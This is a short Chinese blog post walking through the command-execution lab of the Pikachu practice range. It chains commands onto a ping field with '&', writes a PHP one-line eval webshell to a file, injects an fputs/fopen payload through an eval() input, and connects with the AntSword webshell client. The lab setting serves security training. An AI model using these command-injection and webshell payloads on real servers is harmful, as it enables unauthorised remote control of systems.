Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
一拳一个娘娘腔18 分钟前
【SRC漏洞挖掘系列】第10期:GraphQL & API 安全 —— 现代 API 的“裸奔”时代
后端·安全·graphql
看到代码头都是大的30 分钟前
CentOS环境下手动升级openssl、openssh
linux·运维·centos
浮生若城31 分钟前
Linux——Ext系列文件系统
linux·运维·服务器
ITyunwei098732 分钟前
主流 SaaS 工单系统对比
运维·服务器·人工智能
云栖梦泽在1 小时前
AI安全实战:AI系统应急响应的实战演练案例
大数据·人工智能·安全
weixin_548444261 小时前
爆红处理APK 自动化编译流水线 v2026(英文名:APK AutoPipeline)
运维·自动化
枳实-叶1 小时前
【Linux驱动开发】第16天:按键中断完整实战
linux·运维·驱动开发
Chockmans2 小时前
春秋云境CVE-2020-21652(极速版)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2020-21652
難釋懷2 小时前
Nginx-UrlRewrite
运维·nginx
qq_白羊座2 小时前
CI/CD 与 DevOps 四
运维·ci/cd·devops
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04Codex 接入 DeepSeek API 完整配置文档05【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)092026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot10Windows端Codex接入第三方模型(DeekSeek,BaiLian)